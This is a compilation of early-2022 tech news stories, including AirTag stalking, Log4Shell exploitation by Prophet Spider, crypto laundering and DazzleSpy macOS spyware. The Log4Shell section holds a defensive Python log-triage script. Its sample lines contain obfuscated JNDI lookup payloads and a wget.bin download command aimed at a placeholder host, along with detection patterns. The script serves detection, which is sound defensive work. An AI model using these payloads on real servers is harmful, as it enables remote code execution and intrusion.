More stories


    AirTag use in theft and stalking incidents prompts Apple to update its Personal Safety User Guide

    Apple updated its Personal Safety User Guide in an attempt to better help customers and potential victims understand what to do if they find an AirTag that may have been placed on their person or vehicle without their permission.

    In recent weeks, a spate of local and national news reports about stalking incidents and auto theft attempts involving AirTags has popped up. The reports typically involve someone finding an unknown AirTag secreted away in a handbag, tucked behind their vehicle’s license plate, or stashed somewhere else that lets a thief or stalker track the victim or their vehicle. In what was almost certainly an effort to alleviate some of the negative public sentiment toward AirTags caused by continued reports like this, Apple has updated its Personal Safety User Guide with new advice on what to do if you find an AirTag that may be tracking you for criminal purposes. The refresh was confirmed by an Apple spokesperson speaking with TechCrunch.

    While the guide itself isn’t exactly new, its availability in website form, as opposed to a downloadable PDF, is. It also now features an expanded “Stay safe with AirTag, and other Find My accessories” section, which includes more detailed steps for dealing with the discovery of an unknown AirTag for both iOS and Android device users. Apple didn’t go so far as to suggest in the expanded guide that any discovered tracker should be assumed to be a tool of criminal activity. Instead, the company couched its advice in the possibility that the AirTag might simply be “attached to an item you are borrowing.”

    AirTags are designed to make a sound once they have been separated from the Apple device to which they are registered. This is how many of the unknowing victims in these reports discovered the devices being used to track them when they did not own an iPhone themselves. If the user does own an iPhone, they should receive an alert from iOS’ built-in Find My app letting them know an unknown AirTag is moving with them. This is a safety feature Apple references in its Personal Safety User Guide and one that was specifically designed to prevent the kinds of criminal and invasive uses described here. Unfortunately, there are many situations in which the sound emitted by an AirTag may be hard or impossible to detect. The relatively modest chirp let out by the small trackers would be difficult to pick up over the sound of a running car, for instance. Apple’s unwillingness, so far, to address this issue or offer any updates to the behavior of AirTags themselves has frustrated some privacy and safety advocates.

    To be fair, AirTags are far from the only devices that can be used for this purpose, and they are definitely not the first trackers small enough to be hidden on a person or car. Products from Tile, Samsung and other brands with similar tracking capabilities were already available, as were devices from brands like Whistle designed to track lost pets. The latter even include GPS functionality, meaning potential criminals could track their targets in situations where no amenable Bluetooth devices were nearby to help. The main reason Apple’s AirTags appear to be getting name-dropped in so many of these reports is the simple fact that the safety feature Apple integrated to alert potential victims to the presence of an unknown AirTag is doing its job, leading to the discovery of the devices by potential victims. None of the other trackers mentioned provides those same safety features, and all require the direct intervention of their owners in order to make a sound. As other news outlets have noted, this could well mean that the use of trackers like AirTags in criminal stalking or theft cases has been an ongoing, silent problem for much longer than most of us have realized. If that truly is the case, then it’s a situation that must be addressed not just by Apple but by the tech industry as a whole.


    Update your iPhone and iPad right now. Apple just released a bunch of security fixes

    Screenshots by Jason Cipriani/ZDNet
    It’s time to update your Apple devices once again. Apple on Wednesday released several security updates for the iPhone, iPad, Apple TV, Apple Watch, and Mac lineup. More specifically, Apple released iOS 15.3, iPadOS 15.3, watchOS 8.4, and macOS 12.2. The change log for each update only states that the update includes “bug fixes and security updates” but doesn’t mention any other changes or new features. Typically, whenever Apple releases an update that takes a version number from something like 15.2.1 to 15.3, it includes more than just bug fixes. However, Apple’s security updates page details several issues that are fixed in the most recent updates. For example, iOS 15.3 and iPadOS 15.3 include 10 different security fixes that range from applications gaining access to your iCloud files to malicious applications gaining root privileges. The update also fixes the Safari bug that was first reported earlier this month, which allowed a website you visit to learn which other sites you had visited, and potentially even your Google User ID. You can update your iPhone or iPad by opening Settings, then going to General > Software Update and following the prompts.

    On your Mac, open System Preferences > Software Update. Apple Watch owners can use the Watch app on their iPhone to install the latest update, while Apple TV users can follow the same steps used on the iPhone. With a healthy list of potentially serious bugs and security issues now fixed across all of Apple’s hardware products, hopefully we’ll see some new features and improvements in iOS 15.4. Did you find anything new in iOS 15.3? If so, let us know in the comments below. So far, we haven’t been able to find anything.


    Loki, Godzilla, WandaVision, Justice League top list of most pirated content in 2021

    Films like Godzilla vs. Kong and TV shows like Loki and WandaVision topped Akamai’s list of the most pirated content in 2021. The company released a detailed report on its efforts to stop people from pirating both live content and films, TV, music, and books. The report also includes data from MUSO, which found that television is the most pirated content at just over 67 billion total visits to pirated content sites.

    The top 10 most pirated films from January to September 2021 are Godzilla vs. Kong, Zack Snyder’s Justice League, Black Widow, F9, Mortal Kombat, The Suicide Squad, Cruella, Wonder Woman 1984, Raya and the Last Dragon, and Jungle Cruise. The most pirated TV shows include Loki, WandaVision, Rick and Morty season 5, The Falcon and the Winter Soldier, The Walking Dead season 10, Game of Thrones season 8, The Flash season 7, Vikings season 6, True Beauty, and Superman & Lois.

    When it comes to how people are accessing pirated content, MUSO found that more than 61% are doing so “directly”, although it is not explained what exactly that means. About 29% of people are searching for pirated content and others are “accessing content via referrals from other websites, social media, display ads, or email ads.”

    “Considering the television and film industries alone — including both public and private torrent files, as well as web downloads, stream ripping, and direct streaming — there were 82 billion visits to piracy websites between January and September 2021. If you add in music, software, and publishing to these figures, the total jumps to over 132 billion,” Akamai explained. “Globally, during the nine-month reporting window, the United States (13.5 billion), Russia (7.2 billion), India (6.5 billion), China (5.9 billion), and Brazil (4.5 billion) were the top five locations for piracy website visits.”

    The US, Russia, and India account for more than 27 billion piracy website visits. (Image: Akamai)

    MUSO data shows that the average visits per internet user reached 20.01 across the nine-month reporting window, with the United States, followed by Russia and China, ranking as the leading three sources of visitor traffic to sites with pirated TV content. Akamai noted that the numbers make sense because much of the content being pirated is not legally available in the countries most interested in it. Anime is also pirated profusely, and Akamai found that the top such domain generated 940 million visits from January through September 2021.

    Surprisingly, MUSO data showed that publishing was the second most pirated content category, with more than 30 billion total visits. “The average visits per internet user reached 9.03 during the reporting window, with the United States, Japan, and Russia ranking as the top three sources of visitor traffic. The top piracy websites focus heavily on manga and other book-based content, with the top website clocking more than 955 million visits during the reporting period,” Akamai said.

    Film, music, and software rounded out the list of most pirated content. The film industry accounted for 14.5 billion website visits from January to September. Music sites saw 10.8 billion visits even as a number of sites closed down. The top traffic sources were India, followed by Iran and the United States, according to Akamai and MUSO.

    “Software piracy is another type of piracy that has existed online for almost as long as the internet has. It’s a broad category that includes video games as well as modern PC software. With 9 billion total visits, an average of 2.68 per internet user, a fifth-place showing is still a rather large problem,” Akamai explained. “Combined, the top three piracy websites accounted for more than 16% of the overall visitations in the top 100, with more than 722 million visits during the nine-month recording period. The top traffic sources were China, followed by Russia, and the United States.”


    Ransomware is still the biggest security worry for business, but it's not the only headache

    Ransomware is the number one cybersecurity concern that Chief Information Security Officers (CISOs) are facing at the beginning of 2022, but it’s just one of many issues they’re attempting to tackle. According to research by Microsoft, addressing the threat posed by ransomware is the number one cybersecurity challenge currently facing CISOs, closely followed by configuring cloud security and protecting hybrid, multi-platform enterprise environments. Ransomware was the most significant cybersecurity issue during 2021 and, according to the survey, CISOs don’t think that’s going to change anytime soon, as cyber criminals continue attempts to encrypt networks and demand a ransom payment, which can be millions of dollars, for the decryption key. The threat is also increased by the rise of ransomware-as-a-service schemes, which allow even more cyber criminals to conduct ransomware campaigns, putting organisations at even greater risk of falling victim to an opportunistic attack. “No longer do individual cybercriminals have to develop their own tools. Today, they can simply buy proven cybercrime kits and services to incorporate into their campaigns. This gives the average cybercriminal access to better tools and automation to enable scale and drive down costs,” said Vasu Jakkal, corporate vice president for security, identity and compliance at Microsoft. “As a result, attacks of all types are on the rise, with the economics behind successful ransomware attacks fueling a rapid trajectory,” she added.

    But while ransomware is viewed as the number one threat, CISOs have a variety of other concerns, including cloud security, which has been pushed to the forefront by the rise of hybrid working. While cloud offers opportunities, it also comes with several security concerns that need to be addressed. For example, it’s useful for staff to be able to access corporate cloud accounts remotely, but the fact that those accounts can be reached from anywhere gives cyber criminals additional avenues to infiltrate networks, especially if they’re able to steal the legitimate username and password of a real user. According to the Microsoft survey, other key cybersecurity challenges CISOs are facing in 2022 include recruiting security professionals and enabling user productivity without sacrificing security. Cloud security is the most desired investment for the year, along with the likes of vulnerability management and application security. “As security leaders look to mitigate threats now and in the near future, we’re seeing an increased focus on improving the prevention capabilities of the highest growth threat vectors, such as cloud security, access management, cloud workloads, hybrid work, and ransomware,” said Jakkal. Microsoft’s recommendations on how to improve cybersecurity throughout organisations include implementing multifactor authentication (MFA) and shutting down legacy authentication methods, which cannot enforce MFA and can therefore be exploited by cyber criminals holding a stolen password.


    Report: Cybercriminals laundered at least $8.6 billion worth of cryptocurrency in 2021

    Cybercriminals managed to launder at least $8.6 billion worth of cryptocurrency in 2021, according to a new report from blockchain analytics company Chainalysis.

    The company said the $8.6 billion represents a 30% increase in money laundering activity over 2020 but is dwarfed by 2019, which saw at least $10.9 billion laundered. Chainalysis said cybercriminals have laundered $33 billion worth of cryptocurrency since 2017. Chainalysis explained that these figures only represent funds derived from “cryptocurrency-native” crime, meaning cybercriminal activity such as darknet market sales or ransomware attacks in which profits are almost always derived in cryptocurrency rather than fiat currency. Chainalysis does not have a way to measure the fiat currency from drugs or other crime that is converted into cryptocurrency after the fact. Kim Grauer, head of research at Chainalysis, told ZDNet that, to give a sense of the importance of the $8.6 billion figure, there is no comparable way to quantify the amount of money laundering in the fiat world. The report notes that while billions of dollars’ worth of cryptocurrency move from illicit addresses every year, most of it ends up at a small group of services, many of which “appear purpose-built for money laundering based on their transaction histories.”

    2021 represents the first year since 2018 in which centralized exchanges didn’t receive the majority of funds sent by illicit addresses, with DeFi protocols making up much of the difference. DeFi protocols received 17% of all funds sent from illicit wallets, $900 million, in 2021 compared to just 2% in 2020.

    “Many of the hacks we saw this year were of DeFi protocols, so it makes sense that the funds were sent to DeFi services that can handle large amounts of liquidity from really any token you can imagine,” Grauer said. “We also know that criminals are always the fastest to adapt to the use of new technologies to evade detections, and this year was no different.”

    The report says addresses associated with theft sent just under half of their stolen funds to DeFi platforms, over $750 million worth of cryptocurrency in total. As Chainalysis previously reported, North Korea-affiliated hackers were responsible for $400 million worth of cryptocurrency hacks last year and used DeFi protocols extensively for money laundering. “This may be related to the fact that more cryptocurrency was stolen from DeFi protocols than any other type of platform last year. We also see a substantial amount of mixer usage in the laundering of stolen funds,” the researchers explained. “Scammers, on the other hand, send the majority of their funds to addresses at centralized exchanges. This may reflect scammers’ relative lack of sophistication. Hacking cryptocurrency platforms to steal funds takes more technical expertise than carrying out most scams we observe, so it makes sense that those cybercriminals would employ a more advanced money laundering strategy.” Grauer added that while it was not totally unexpected, the growth in the use of mixers to move funds was striking this year. “The amount of money going to mixers, particularly from bad actors such as North Korean hacking groups, continues to grow in significance,” Grauer said.

    Money laundering is also concentrated in a small number of services and a small number of deposit addresses, according to Chainalysis. The company found that 58% of all funds sent from illicit addresses moved to five services last year, compared to 54% in 2020. Just 583 deposit addresses received 54% of all funds sent from illicit addresses in 2021, the researchers found, and each of those 583 addresses received at least $1 million from illicit addresses. In total, they received just under $2.5 billion worth of cryptocurrency. “An even smaller group of 45 addresses received 24% of all funds sent from illicit addresses for a total of just under $1.1 billion. One deposit address received just over $200 million, all from wallets associated with the Finiko Ponzi scheme,” the researchers explained. “While money laundering activity remains quite concentrated, it’s less so than in 2020. That year, 55% of all cryptocurrency sent from illicit addresses went to just 270 service deposit addresses. Law enforcement action could be one possible reason money laundering activity became less concentrated.”

    The report cites the US Treasury Department’s sanctions against Russia-based OTC broker Suex and P2P exchange Chatex as one example of law enforcement action leading to money laundering activity becoming less concentrated. Chainalysis said several addresses associated with both services appeared in the 270 it identified as the biggest laundering addresses in last year’s report. The researchers theorized that cybercriminals began to disperse their money laundering after some of the services closed or after seeing the law enforcement action against certain platforms. “There is a consolidation point of funds flowing to laundering services, oftentimes hosted on exchanges, that are able to handle the movement of large quantities of funds,” Grauer said. “The key takeaway for us is that the criminal landscape might not be as large as you think. We have found this in years past and continue to highlight the relevance of structural money laundering in the cryptocrime landscape.”

    The report added that the 20 biggest money laundering deposit addresses received just 19% of all Bitcoin sent from illicit addresses, compared to 57% for stablecoins, 63% for Ethereum, and 68% for altcoins.


    Log4J: BlackBerry finds Prophet Spider access broker exploiting VMware Horizon

    Initial access broker group, Prophet Spider, has been found exploiting the Log4J vulnerability in VMware Horizon, according to a new report from researchers with BlackBerry Research & Intelligence and Incident Response teams.


    Even though VMware released a patch in December and has published extensive guidance on how to mitigate the issue, many implementations remain unpatched. Tony Lee, vice president of global services technical operations at BlackBerry, told ZDNet that his team has found evidence correlating attacks from Prophet Spider with the exploitation of the Log4J vulnerability in VMware Horizon. “When an access broker group takes interest in a vulnerability whose scope is so unknown, it’s a good indication that attackers see significant value in its exploitation,” Lee said. “It’s likely that we will continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability, so it’s an attack vector against which defenders need to exercise constant vigilance.”

    BlackBerry found mass deployments of cryptocurrency mining software and Cobalt Strike beacons but also discovered “an instance of exploitation containing tactics, techniques, and procedures relating to the Prophet Spider IAB.” The researchers noted that the group is known to compromise networks and later sell access to ransomware operators. “One of the indicators that helped us attribute the event to this threat group was their use of the C:\Windows\Temp\7fde folder path to store malicious files. The threat actor also downloaded a copy of the wget.bin executable, which the group has historically used to get additional files onto infected hosts. The IP used in the download cradle has also been previously attributed to the Prophet Spider group,” the researchers wrote.

    Security firms and many other organizations have warned about Log4J vulnerabilities in VMware Horizon since the beginning of the year. The UK’s National Health Service (NHS) was one of the first to warn that hackers were attempting to exploit a Log4J vulnerability in VMware Horizon servers to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and carry out other malicious activity. A VMware spokesperson said the company is “working around the clock to patch and provide the necessary guidance for customers to do the same.” “With SaaS products, the company providing the software can quickly and efficiently implement the security patches. But organizations using on-premises licenses of software products must take their own affirmative steps to apply the security patch in their own environment,” the company explained. VMware said that even with its security alerts and efforts to contact customers directly, it continues to see that some companies have not patched. “VMware Horizon products are vulnerable to critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the information provided in our security advisory, VMSA-2021-0028, which was first published on Dec. 10, 2021, and updated regularly with new information,” the spokesperson said. “Customers who have not applied either the patch or the latest workaround provided in VMware’s security advisory are at risk of being compromised, or may have already been compromised, by threat actors who are actively leveraging the Apache Log4Shell vulnerability to compromise unpatched, internet-facing Horizon environments. Any time we see vulnerabilities that are as far-reaching as Log4J, it is critical that all impacted users move quickly to implement security responses.”


    The Log4j flaw hasn't led to massive hacking attacks. But that doesn't mean the threat is over

    Log4Shell affected hundreds of millions of devices and was cast as a critical tech emergency that would almost certainly be exploited by attackers around the globe. But a month after the Apache Software Foundation disclosed Log4Shell in its Log4J library on December 9, the US Cybersecurity and Infrastructure Security Agency (CISA) said it hadn’t seen any major breach arise from the flaw, with the exception of an attack on the Belgian Defense Ministry.


    The reason for the initial concern was that the Java-based logging library was embedded in so many in-house enterprise applications and hundreds of products from VMware, Oracle, IBM, Cisco and others. Despite this, exploitation of the vulnerability has so far been limited to a handful of campaigns. Security firm Rapid7 saw a surge in exploit attempts against VMware’s Horizon servers, and Microsoft observed the China-based double extortion ransomware gang NightSky targeting vulnerable instances of Horizon. Despite the absence of immediate mass exploitation, Sophos’s Chester Wisniewski backs the view that it will be a target for exploitation for years to come. Microsoft continues to rate the Log4j vulnerabilities as a “high-risk situation” for companies across the globe and reckons there is high potential for their expanded use. But for now, Wisniewski believes an immediate crisis has been swerved.

    “[T]he immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanised people into action. This was seen back in 2000 with the Y2K bug and it seems to have made a significant difference here,” says Wisniewski.

    Sophos detected a huge surge in internet-scanning activity in mid-December, conducted by researchers or threat actors, that petered out by the end of January, by which point most exploitation was by cryptocurrency-mining malware. While Log4Shell is easy to exploit on some systems, Log4J is embedded in many applications in different ways, which makes reliable exploitation more challenging. “Another factor to consider when evaluating the scanning numbers is that a Log4Shell type of flaw is exploited differently based on which application the Log4J code is in and how it has been integrated with that application. This results in a high volume of redundant scans trying different ways to exploit different applications,” says Wisniewski.

    CISA warned, however, that attackers might be holding back from using access gained through Log4Shell until alert levels fall. That is, attackers could lie dormant within a network, waiting to deploy malware months later. Wisniewski supports CISA’s cautionary stance. “Sophos has observed countries such as Iran and North Korea pounce on VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy the patches, and then waiting months before using that access in an attack,” he says. As for the duration of Log4Shell, Wisniewski reckons internet-facing applications will be found and patched or taken offline. But that still leaves a ton of internally vulnerable systems that might never be discovered, hence Log4Shell will live on for years as a favorite target for penetration testers and state-backed threat actors.
    Though not the first major open-source software flaw to rattle the internet, it did prompt talks in January between major tech players and the White House aimed at figuring out how to respond to and avert the next major open-source bug, in particular by improving the transparency of the software supply chain.
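    Both Log4Shell stories above reduce, on the defender's side, to pattern matching over logs, with one complication worth showing: Log4j's own lookup syntax lets an attacker write the trigger as ${${lower:j}ndi: or ${${::-j}ndi: instead of ${jndi:, so a scanner that only greps for the literal string misses real attempts. The Python below is an added example, not code from BlackBerry, Sophos, VMware or CISA. It collapses nested lookups into their canonical form before matching, and separately flags the two host indicators quoted in the BlackBerry report (the C:\Windows\Temp\7fde staging folder and wget.bin). The log lines are constructed for the demo using documentation IP ranges; the download-cradle IP from the report is not on the page and is not included.

```python
"""Log4Shell log triage (added example; constructed sample data).

Check 1 undoes the Log4j nested-lookup tricks (${lower:j}, ${::-j},
${env:NAME:-j}) that hide "${jndi:" from naive matching, then looks for the
canonical lookup. Check 2 flags the Prophet Spider post-exploitation
indicators quoted above: the C:\\Windows\\Temp\\7fde folder and wget.bin.
"""
import re

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")          # a ${...} with no nested ${ inside
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_STAGING_DIR = re.compile(r"c:\\windows\\temp\\7fde", re.IGNORECASE)
_WGET_BIN = re.compile(r"\bwget\.bin\b", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Evaluate one innermost lookup for the obfuscation forms seen in the wild.

    Only lower/upper and the ':-default' fallback are emulated. Any lookup we
    do not evaluate (env, sys, date, jndi itself, ...) is returned unchanged,
    which is what makes the normalisation loop terminate.
    """
    key, has_default, default = inner.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if has_default:            # ${::-j}, ${env:NOPE:-j}, ${sys:nope:-j} ...
        return default
    return "${" + inner + "}"


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse innermost lookups until nothing changes (bounded by max_rounds)."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            return text
        text = new
    return text


def triage(lines):
    """Return (line number, kind, evidence) for each suspicious line."""
    findings = []
    for n, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        if _JNDI.search(norm):
            findings.append((n, "log4shell-lookup", norm))
        if _STAGING_DIR.search(raw) or _WGET_BIN.search(raw):
            findings.append((n, "prophet-spider-ioc", raw))
    return findings


# Constructed for this example; 203.0.113.0/24 is a documentation range.
SAMPLE_LINES = [
    '203.0.113.7 GET /portal/info.jsp UA="${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.8 GET /portal/ UA="${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9:1389/x}"',
    '203.0.113.8 GET /portal/ UA="${${env:NOPE:-j}ndi:${sys:x:-r}mi://203.0.113.9:1099/y}"',
    '203.0.113.5 GET /portal/logo.png UA="Mozilla/5.0 (X11; Linux x86_64)"',
    'HOST01 ProcessCreate "C:\\Windows\\Temp\\7fde\\wget.bin" http://203.0.113.9/c -O C:\\Windows\\Temp\\7fde\\c.bin',
    'HOST02 ProcessCreate svchost.exe -k netsvcs',
]

if __name__ == "__main__":
    for n, kind, evidence in triage(SAMPLE_LINES):
        print(f"line {n}: {kind}: {evidence}")
```

    Running it prints lines 1 to 3 as Log4Shell lookups (the second and third only after normalisation) and line 5 as a Prophet Spider indicator. The normaliser emulates only lower, upper and the :-default fallback; a real Log4j instance also resolves env, sys, date and other lookups, so a ${...} that survives normalisation in a request field deserves a look rather than being treated as clean.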


    DazzleSpy: Pro-democracy org hijacked to become macOS spyware distributor

    Researchers have uncovered a new strain of macOS malware in targeted attacks against visitors to a Hong Kong pro-democracy radio station website. 


    The website was used to facilitate a watering hole attack and to serve a Safari browser exploit to visitors, leading to the deployment and execution of spyware on victim machines. Dubbed DazzleSpy by ESET researchers, the malware is a backdoor for conducting surveillance on an infected Mac. ESET’s investigation follows past research conducted by Google’s Threat Analysis Group (TAG) security team. On November 11, 2021, TAG said watering hole attacks had been spotted on a media outlet and a pro-democracy political website targeting Hong Kong residents. That attack chained a browser exploit with an XNU privilege escalation vulnerability in macOS Catalina, a type confusion zero-day now tracked as CVE-2021-30869 and since patched by Apple, leading to the execution of the backdoor malware. “Based on our findings, we believe this threat actor to be a well-resourced group, likely state-backed, with access to their own software engineering team based on the quality of the payload code,” Google TAG said.

    ESET has now provided a breakdown of additional attack vectors used and the exploit itself. The legitimate pro-democracy online radio station D100 was compromised to serve the payload via an iframe between September 30 and November 4, 2021. In addition, fake ‘liberate Hong Kong’ websites also delivered the malware. “Both distribution methods have something in common: they attract visitors from Hong Kong with pro-democracy sympathies,” ESET says. “It seems that they were the primary target of this threat.”

    The attack chain begins by running a script that checks which version of macOS is installed. JavaScript containing exploit code, mac.js, is then deployed to trigger the WebKit engine flaw; this browser bug is distinct from the XNU privilege escalation flaw, CVE-2021-30869, that the chain uses in its next stage. The WebKit exploit is used to obtain memory read and write primitives, with object address leaks and the ability to create fake JavaScript objects being the overall goal. The next step loads a Mach-O executable into memory and achieves code execution through the local privilege escalation weakness, allowing it to run as root and execute the next payload.

    In ESET’s sample, the payload differs from TAG’s findings. The DazzleSpy macOS malware has a range of capabilities, including collecting macOS data such as hardware UUIDs and serial numbers, extracting Wi-Fi SSIDs, downloading user files from the infected machine, enumerating files in the Desktop, Downloads, and Documents folders, launching remote sessions, and executing shell commands. ESET says that the malware will also check whether it can take advantage of CVE-2019-8526, a critical vulnerability fixed in macOS Mojave 10.14.4: if the macOS version is below 10.14.4, keychain information is stolen. Once it has connected to a C2, secure communication appears to be a high priority. “In practice, the same self-signed certificate is used for both the CA and the C&C server,” the researchers say. “The technique protects the malware’s communications from potential eavesdropping by refusing to send data if end-to-end encryption is not possible.”

    The researchers also say that the watering hole attack has similarities with the deployment of the LightSpy implant. Kaspersky said in 2020 that the malware appeared on websites aimed at residents of Hong Kong, and temporarily named the advanced persistent threat (APT) group believed to be responsible TwoSail Junk. Trend Micro has also published research (PDF) on the threat actor’s mobile activities. “We cannot confirm at this point whether both campaigns are from the same group,” ESET noted.